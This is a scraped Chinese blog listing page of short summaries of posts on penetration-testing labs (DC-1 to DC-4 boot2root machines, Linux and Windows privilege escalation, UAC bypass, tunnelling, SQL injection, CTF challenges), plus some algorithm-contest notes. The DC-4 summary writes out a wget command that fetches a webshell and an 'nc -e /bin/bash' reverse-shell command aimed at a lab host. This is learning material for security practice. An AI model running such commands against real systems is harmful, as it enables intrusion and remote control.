自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(36)
  • 收藏
  • 关注

原创 DC-4靶机冲冲冲!!

使用命令:wget http://192.168.163.131:8889/webshell.phpnc -e /bin/bash 192.168.163.131 8888稍微改一下。

2024-08-11 15:03:53 419

原创 DC-3靶机打靶练习!!!!

joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具kali自带的漏洞库:找文件的命令 find / -name *falg*john的密码暴力破解以及破解成功存放的位置/root/.john/john.pot文件巩固了交互shell :​​​​​​​。

2024-08-11 14:28:06 627

原创 域环境的搭建 内网学习不会搭建环境???

然后我们在把BOSS加入子域控里面去,这样DC不能直接控制,但是可以通过控制web来进行控制。直接到安装 当你们遇见先决条件检查不通过的时候,你可以使用下面的命令。web也是类似的,下面操作都是类似的,创建一个账号,然后加入就行了。然后在更改密码,但是有时候还是不能通过,你就换一个机器。备选的dns才是dc的,要不然子域控配置不了。下面都是一样的跟配置上面的DC是一样的。然后就加入域环境里面去。

2024-08-03 03:02:27 286

原创 DC-2靶机试试看 继续打靶!!冲冲冲!!

这次打靶机学到了bash逃逸,以及我们在爆破的时候可以根据网站来爬取密码和账号,这点也是我的收获。也复习了一些git提权吧,继续干干干!compgen -c 如果我们可以直接使用cp命令我们可以直接直接复制到本地用户目录。然后我们收集到的密码,然后我们在去收集账号。像上面一样来进行逃逸的,这样来进行逃逸的。然后我们就使用来查看我们可以使用的命令。使用wpsan来根据网站来获取账号。意思是我们要登录到jerry的用户。还可以使用另外的工具来进行操作。下面有提示 rbash。

2024-08-03 02:58:22 376

原创 DC-1靶场打靶第一次!!!!冲冲冲!

第一次打这样的靶机,还是挺舒服的,liunx提权以前就知道,也没有实操过,实操和看视频完全是2个样子,我也是完整的进行了一次渗透吧,继续加油。干就完了!!!!

2024-07-22 04:20:16 481

原创 内网渗透隧道构建,使用github项目联动msf绕uac,使用简单的spp来进行操作icmp隧道

我们还是照样生成msf的后面文件,然后我们在绕过uac的时候,前面讲的是使用msf内置模块,但是那个绕过的成功率比较低,我们使用这个项目成功率大大的提高。然后我们先来进行操作,我们是这样来上线的,我们要使用spp这个工具,个人感觉安装比pingtunnel感觉要简单一点。我们客户端要用spp,服务器也要有spp,下面我们来演示怎么构建的,以及我是这么确定是走的icmp而不是其他的协议。开启过后,我们在创建我们先开始说的2个监听器。然后我们要准备2个cs的监听器,一个是本地的,一个是cs服务端的。

2024-07-22 03:39:36 313

原创 内网渗透第7天 socker代理 会不会???我们使用cs以及msf来建立代理 代理真的容易???步骤弄明白了吗??

我们在进行内网渗透的时候,第一步要解决的就是网的问题,网络我们都不通或者我们都不能进行访问怎么能进行后门的渗透。这的图非常的简单,也没有waf等阻碍,我们的目的就是攻击机器可以对web进行渗透,我们怎么办,我们来看看图,DHCP是有网络的,意思是它可以上网,所以我们先拿下DHCP的权限,通过DHCP去访问web。我们就要建立代理,我们不可能把渗透攻击全部上传到DHCP上面去,我们要让web通过CS来进行上线的操作,而且我们也访问不到web创建的页面(虽然我这没有),但是建立了代理我们就可以访问了。

2024-07-09 16:39:02 400

原创 cs也能上线liunx马??你会吗???解决木马生成的操作。

第四:我们在使用的时候可能是cs版本不对,我的是4.8然后没成功,后面换成4.7就过了这点也可以是失败点的问题。我们要在cs客户端配置监听器,这个liunx上线只能是https的监听器,我们来看看操作。我的是kali为cs的服务端 然后我的win10为cs的客户端来进行操作。首先下载配置文件,然后我们是服务端是什么系统我们就下载什么系统来进行操作。也是生成成功了,我们在当前的目录找出来然后给他赋予权限,在进行执行就行了。一个是我们在kail上面的地址 一个是我们的系统。第一:路径不要选择错误了。

2024-07-09 16:36:55 405

原创 docker也能提权??内网学习第6天 rsync未授权访问覆盖 sudo(cve-2021-3156)漏洞提权 polkit漏洞利用

现在我们来说说liunx提权的操作:前面我们说了环境变量,定时任务来进行提权的操作我们先来说说什么是rsyncrsync是数据备份工具,默认是开启的873端口我们是使用docker下载镜像文件,什么镜像文件是不重要的,然后将root目录挂载到mnt容器中然后我们就可以在mnt目录中看见与root是一样文件了,你在外部看这个目录是空的。在这里面进行相对应的操作。sudoedit -s / 像下面的这样的话就说明是没有漏洞的如果不是这样的就说明是存在这个漏洞的。我们也可以直接看版本来确定有没有漏洞然后我

2024-07-05 10:33:54 422

原创 内网学习第6天 liunx定时任务 环境变量和权限配置,以及数据库提权

tar czf a.tar * 这个是在进行打包文件 *打包所以的文件 a.tar打包文件的名字。主要我们普通的用户都可以编辑计时任务,我们写一个反弹shehll进去,这样就可以获取管理员的权限。这个就是管理员在配置计时任务的时候权限没有控制好,也就是任意的人都可以编辑计时任务。

2024-07-05 10:33:43 1371

原创 web权限到系统权限 内网学习第一天 权限提升 使用手工还是cs???msf可以不??

现在开始学习内网的相关的知识了,我们在拿下web权限过后,我们要看自己拿下的是什么权限,可能是普通的用户权限,这个连添加用户都不可以,这个时候我们就要进行权限提升操作了。权限提升这点与我们后门进行内网渗透是乘上启下的,没有权限进行什么的操作都比较难进行。

2024-07-02 22:42:09 1041

原创 内网渗透第四天!!!冲冲冲!!怎么绕过uac以及你会dll劫持???不安全的服务路径以及服务权限,你会吗???

上面我们简单的说了一下绕过uac,但是我们使用的msf模块ask要对方管理员跟我们一起来进行操作,才可以进行提权的操作,这点就限制住了我们。我们今天来讲一下不用钓鱼的绕过的操作。

2024-07-02 22:38:43 1124

原创 Administrators就最高了???system是什么??本地用户提权内网学习第三天 你知道uac是什么??

我们先来说说uac是什么东西,uac其实说简单一点,就是你要运行某个程序的时候弹出的是与否uac是用户控制的我们怎么来看uac在cmd中输入msconfig进入然后我们进行普通的提权的时候是不能超过的,下面我们来看看不超过的样子。

2024-07-01 18:22:18 734

原创 你真的会udf提权???数据库权限到系统权限 内网学习 mysql的udf提权操作 ??msf你会用了吗???

我们的udf提权和反弹shell提权是类似的,反弹shell就是直接执行命令来建立这些操作,命令是写好了的通过编码进行操作的,也是创建dll文件。与udf提权是类似的。在实际的提权操作还有很多妨碍我们的,我们会遇见很多的,导致提权不成功的操作。mysql的udf提权前提:1:要有数据库密码和账号2:secure-file-priv=空或者写入的路径各个好是我们要写的地方。

2024-07-01 00:39:18 860

原创 war后门文件部署 什么是war后门文件 为什么要部署???看见war后门文件部署你知道????

在漏洞复现的时候做了一道类似的,然后我们就要去了解什么是war包,然后这个漏洞实现要有什么情况??为什么要进行部署??war包在哪些地方可以实现???war是一种java web应用程序打包格式,是把java web应用的相关文件打包成一个单独的文件,war包含了web应用程序的静态资源文件(html,css,js)和服务器java类文件(jsp,servlet),配置文件以及其他必要的文件。war是为了方便开发人员轻松把应用程序部署到服务器上,不用手动复制和配置每一个文件。

2024-06-10 20:51:35 1130 1

原创 rce漏洞试试看 buuctf的pingpingping 试试ctf的rce怎么样

然后我们可以看看index.php来看这个题是过滤了哪些东西,进行总结,也了解了解。先开始我读取index.php这个文件就不能进行读取,我还以为语法出现了错误。到时候在来看看,看看\这个转义特殊字符的,也就是进行强制转换的。也就是上一条的命令的输出结果作为下一条命令的输入。分析一下过滤哪些东西,在源码中可以明确的看出,,也就是说我们要进行绕过,然后我们使用。不行的时候在试试看。直接去看看flag可以读取不?flag所以知道了flag被过滤了。ls来看看,我们来看看有哪些文件。的那篇博客中,然后我们进行。

2024-06-10 15:54:41 480 1

原创 csrf与xss差别 别在弄乱了 直接靶场实操pikachu的csrf题 token绕过可以吗???

我们现在来说说这2个之间的关系,因为昨天的我也没有弄清楚这2者的关系,总感觉迷迷糊糊的。xss这个漏洞是大家并不怎么陌生,导致xss漏洞的产生是服务器没有对用户提交数据过滤不严格,导致浏览器把用户输入的当作js代码返回客户端进行执行,这样就导致了攻击。xss(跨站脚本攻击)可以说简单一点前端js代码可以干什么我们就可以干什么,我们可以获取到用户的cookie,获取键盘记录,钓鱼等等的操作我们来说说csrf这个漏洞csrf(跨站请求伪造)这个是利用用户的。

2024-06-09 22:35:25 1495 7

原创 目录穿越漏洞CVE-2018-7171复现 又学到一招小技巧!!!!

还是半夜睡不着,打开靶机开始操作。今天看了文件下载和目录穿越漏洞想结合以及防御方法。半夜来进行操作一波。复现一下漏洞开始操作起来!!!进入到页面,开始找细节,然后看了前面的提示操作,我前面也是以为要使用contentbases这个参数来进行访问。没有找到我想要的东西然后加上我前面说的那个参数没有找到的操作????我就在仔细去看,是要使用什么rpc/set_all发送带../序列的那个参数来进行操作的然后我去百度知道了rpc这个是远程过程调用的协议。说简单一点就是可以进行远程访问的操作。

2024-06-09 02:48:17 293

原创 半夜睡不着起来看看题 文件上传的Avatar Uploader 1以及CVE-2018-18086漏洞复现

半夜睡不着起来做做文件上传,在半夜还是收获了一些,首先看看buuctf的1这个题,前面直接登录就行了。文件上传真的难上传!!!进去过后就是正常的文件上传的操作,但是它也提示,只能上传png格式的图片。然后抓包进行操作,进行各种各样的绕过,我以为它是我上传正常的png格式的图片还是对我说请上传png图片,我就有点疑惑了,正常的图片怎么也是这样,那它对哪进行了检查,我试了很多中方法,前面我一来我就用了那个数据流::$data这个来进行处理的操作,然后我重新看了一下靶机时间。

2024-06-08 12:07:20 350

原创 强网杯2019随便注!!sqllibs 第11和12关 post注入 sqlmap直接嗦??堆叠注入来看看!!!!

看到了数据库我们在看表,还是一样的加参数 -tables。前面都是get型的注入,我们现在来看看post的sql注入。我在经过简单的尝试过后,也成功的登录了,看看我下面的。sqlamp中加上参数-r “路径”来进行注入。的,看能不能来进行登录,这点就需要我们来进行。post的sql注入的话,我们在看见了。,这点跟get注入不一样。相结合来进行操作,然后把。放到一个记事本中,然后在。post的话我们要跟。

2024-06-08 11:59:32 786

原创 sqlsqllibas第6关报错注入 sqlmap直接嗦!! floor不会爆??

比如说有过滤,我们要尝试绕过,就要去猜后端是怎么进行过滤的,大小写,重写,编码,替换等价的函数,拼接的操作这些方法能不能进行绕过,这些都是要靠经验的。师傅可以跟我说说,为什么没有成功 我才学floor这个函数,不怎么熟悉,可以交流交流。这就是大概的思路,但是说起来简单,实操却不是这样的。最近重新看sql注入,做一下总结,然后说一下做题的思路吧。的,闭合过后,我们要观察是否有明确的回显,如果有我们使用。的,我们就开始注入。闭合的方式不对,明显的错误还是显示正常的回显。sql注入,我们在找的时候,要找与。

2024-06-05 21:42:42 561

原创 sqlmap直接嗦 dnslog注入 sqllibs第8关

工具就是这样来操作,跟上我们要的dnslog的参数,这样就可以了。我们不能直接进行sqlmap盲注,这样容易被对方给封ip,所以我们前面要进行一些手工注入,我们来看看手工注入。但是我们要使用dnsllog注入的要求就比较的严格了,我们要对文件有。经过我的判断,这点是字符,然后闭合的方式是‘来进行闭合的 下面是正常的回显。这点也就是判断出来了注入点,然后就直接进行爆后面的数据,然后我们在来爆到数据库。我们是用了dns解析的时候会留下记录,这时候就可以看见我们想要的内容。

2024-06-05 21:40:45 505

原创 应急响应web3靶场实战

然后都要不行,后面我想到了这个不是我自己的服务器吗,我想干什么就干什么,然后就重置了管理员的密码,也就是进入到网站后台,查看到了hack这个隐藏用户留下的第3个flag。我做到这点过后,怎么都找不到最后一个flag,然后我就看创建的用户的那些文件,和桌面都没有找到有用的线索,,在开机自启动项目这点来下功夫,所有我们在查看计划任务的时候发现了第2个flag以及第2个ip地址。看见2个可疑的东西,查看里面的内容,发现了是我们想要的flag。在我登录失败的时候出现了这个,管理员忘记密码怎么办?

2024-06-01 11:25:16 656

原创 流量分析题目总结

看提示发现是要找到密码,密码也就是post请求,我还是用上面的那个发现没有过滤到有用的线索,然后在只要http的包,然后在看看成功了的数据包。,然后看它的提示发现是文件进行传输的,然后就开始思考,我先开始用过滤器ftp发现是没有的,然后在思考一下,传输文件上传是。,然后它是一张图片,我们要把它转成图片,然后在看到我们想要的flag。今天做了简单的流量分析的题,现在在进行总结一下我的做题思路。我用的下面的那个来进行解码,然后在进行解码用下面的解码网站。然后我们在进行追踪流操作,然后在里面查找我们想要的。

2024-06-01 10:37:44 456

原创 应急响应靶场实战web1

思路很重要,其实应急复杂的,我们要进行排查计划任务,启动项等等,这个挖矿病毒还要删除文件,文件删除不干净他会反复的出现,攻击者要进行权限维持,会有各种各样的进行操作,我们要排查干净,我们在进行操作的时候要一步一步来做好思路的先后顺序。,来确定哪个是挖矿的程序,我们在查看的时候就是没有看见程序运行,但是攻击者在创建了这个用户过后,在该用户的桌面有挖矿的程序,我们找到过后,发现是exe程序但是没有他的配置文件,因为挖矿程序会有一个配置文件,里面会记录。,我们使用工具来进行反编译变成pyc,然后进行在线的。

2024-05-26 11:37:59 367 1

原创 每日一题,今天lcs模板题,动态规划怎么这么难????

按照我现在的理解,我想跟我前面发的那个最大花之能量的博客有点相似的,只不过那个是以最后的元素结尾。这个方程描述了当前状态与之前状态之间的关系,帮助我们在动态规划中有效地求解问题。A[i]等于B[j],则dp[i][j] = dp[i-1][j-1] + 1。状态转移方程是非常重要的一部分,它描述了当前状态与之前状态之间的关系。dp[i-1][j]和dp[i][j-1]看谁的大,我们就更新。最长公共子序列的长度应该是dp[i-1][j-1] + 1。考虑最后一步:在求解最长公共子序列的问题中,我们。

2024-04-19 15:25:54 387 4

原创 蓝桥杯15届总结,下次在战,还需努力!!!!还是太菜了!!

就不知道怎么下手,我准备蓝桥的时间不多也不少,4个月,其他的算法都没有用,数据结构也用的比较少,我还学优先队列这些数据结构,简单的数论也没有考。自己感觉会超时,但是还是这样打了,样例过了,不知道后台怎么样,还有一题就是用的差分和前缀和来做的,样例也是经过修改然后过了的,我只有这3题。不知道后台数据会怎么样,如果这些都过了,那真的是太完美了,但是我感觉是不可能的,填空做了一题,还是错的,然后前面的编程题根本没有想到那点去。编译器也要慢慢的改变,希望16届蓝桥在取得好的成绩,下次在战斗。

2024-04-13 18:07:08 379 4

原创 蓝桥杯省赛最后一场算法小白赛,字符迁移

一个简单的方法,帮助我们来理解,而且不易错,我们难点就是末尾移动到前面的时候,这点很难写。针对移动字符串的移动我决定说一下 字符串在。答案就出来了不会错,记住这个简单的方法就行了。现在按照我下面来写就不会出错,还比较简单。要保证错误率低,还易懂的写法。当前字符的ascll值。

2024-04-06 22:04:40 1235 9

原创 蓝桥杯A组2022最优清零方案 做题感受

看了题目肯定是先操作一个区间的数,然后找到最小值,在进行减1操作,注意这点。减去的至少是1的倍数,所以我们可以直接加最小值到我们的输出的答案中。过后一个一个减去1的,太麻烦了代码量太大了。最后我们就把需要单独减的找出来,加到答案中去就解决问题了。所以我们可以直接减去最小值,减少我们的代码量。我们只有后面慢慢的一个一个的减去1一直到为0。如果我想错了请大佬告诉我,思路就是。在今天做了这道题,有点收获,所以我就在发一个博客。

2024-04-06 18:52:13 215 4

原创 蓝桥杯省赛在即练习一道动态规划经典题型之一

我不知道怎么把这2者加起来,如果我想二者同时要得到也就是,如果我。因为以单个元素结尾的子序列的最大和就是该元素本身。使用数组 b[] 记录以每个位置 i 结尾的子序列的最大和。同时要得到数组元素的下标是连续的并且元素的值也是连续的。将 b[i] 初始化为 a[i],为什么呢?元素下标增大的同时元素也要递增。结尾的子序列的最大和加上。我们说这个是经典的动态规划。结尾的子序列的最大和。就跟我们做数学题一样。

2024-04-06 15:45:58 1208 3

原创 蓝桥杯真题k倍区间详解//看了解答包你会

当遍历到数组的第 j 个元素时,代码通过查看 cnt[a[j]%m] 来确定之前有多少个前缀和与 a[j] 的余数相同。:res 的累加过程:因此,当 res 被累加时,它实际上包含了所有可能的余数情况,不仅仅是余数为 0 的情况。cnt[a[i]%m] 的值被加到 res 时,这代表着所有以第 i 个元素结尾,且和能被 m 整除的子数组的数量。:当两个不同的前缀和 a[i] 和 a[j](假设 i < j)对 m 取余后的结果相同,即 a[i]%m == a[j]%m,所有的余数都被考虑进去了。

2024-04-05 18:22:15 1564 5

原创 蓝桥的进制转换题型以及自己总结进制转换模板

在做的时候我还发现了一个如果这个数是某进制转换过后的值,我们想得到转换之前的值也有相关的模板我找到的。以前只是单纯的知道,他可以把字符串转换成整型。今天也是收获的一天。我们继续讲解下面跟字母相关的进制转换。我们继续,我跟大家补充一个知识点。然后我们来看看下面这个公式有些人肯定知道,字符串转换成整型。,这个函数的问题,编译器上面确不会出现这个问题,9进制不就是在10进制以内吗?下面我们来看看相关的题: 蓝桥省赛。一个数转换到相对应进制的数。转换的字符数组,记住只能是。蓝桥的年号字符串这个题。

2024-03-02 21:13:30 273

原创 蓝桥小白对c++精度问题以及例题演示蓝桥省赛成绩分析和时间显示

直接使用有时候会达到自己想要的结果,但是有时候也会出错。最近一天做了精度问题的题,也遇见一些问题,我把我遇见的问题说出来。,这点是非常让我感觉到不可思议的地方,还可以做到前导0的打印出来,非常的好。在做题的时候总会遇见向上取整或者向下取整或者是四舍五入,这个时候的。并且把解决方法也说出来,可能还不够完善,后续有新的会补充。我们在打印有多少位数的时候不是使用的下面这个代码吗?在做的时候会遇见很多的问题,有时候直接使用函数比如说。小白不清楚的,我也是今天才知道这点的。这点也是运用的非常多的地方。

2024-03-01 21:28:29 176

原创 蓝桥杯 15届 模拟省赛 心得体会 收获一点点,一起进步。

但是我在定义数组的时候,定义的是静态数组,这也导致我在运行的时候会出错,在以前我知道vector这个stl容器。下面给你们看看题目以及最后一道题的解题,也不知道对不对,只是过了样例。前面的题主要考的暴力,还有一点点思维,在做到编程题最后一题的时候,很明显的是dfs类型。今天下午打了4个小时的比赛,本人打的是大学c组,在下午的模拟赛中,我有了新的体会。时候,我没有明白题目的意思,我以为且是并且的意思,所以在打代码的时候就把。该怎么办,所以我在这出现了错误,在后面我经过上网查询以及chatgdp。

2024-02-29 20:56:40 443

原创 蓝桥杯2015国赛------机器人繁殖

所以我们使用double类型//这个类型可以存下64位数,可以说是非常的大了,在这个题目也刚刚好不超过50位。//总结:当我们要用很大的数字相比较的话,如果超出我们定义的数,我们可以使用double类型来解决。//我在做的时候也想到了这一点。当时也是非常的犹豫,想还是过一点是一点。我在做的时候发现了规律,也做不出来,那人肯定是非常不舒服的。但是像这道题我们一般人如果没有推出最后的简化式子的话,很难解决。//所以我们就可以解决这道题了//,所以我写下来分享出来,也是。我们平时定义最大我是定义的。

2024-02-27 19:19:13 536

原创 文件上传绕过

学习记录

2023-11-27 23:20:17 502 2

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除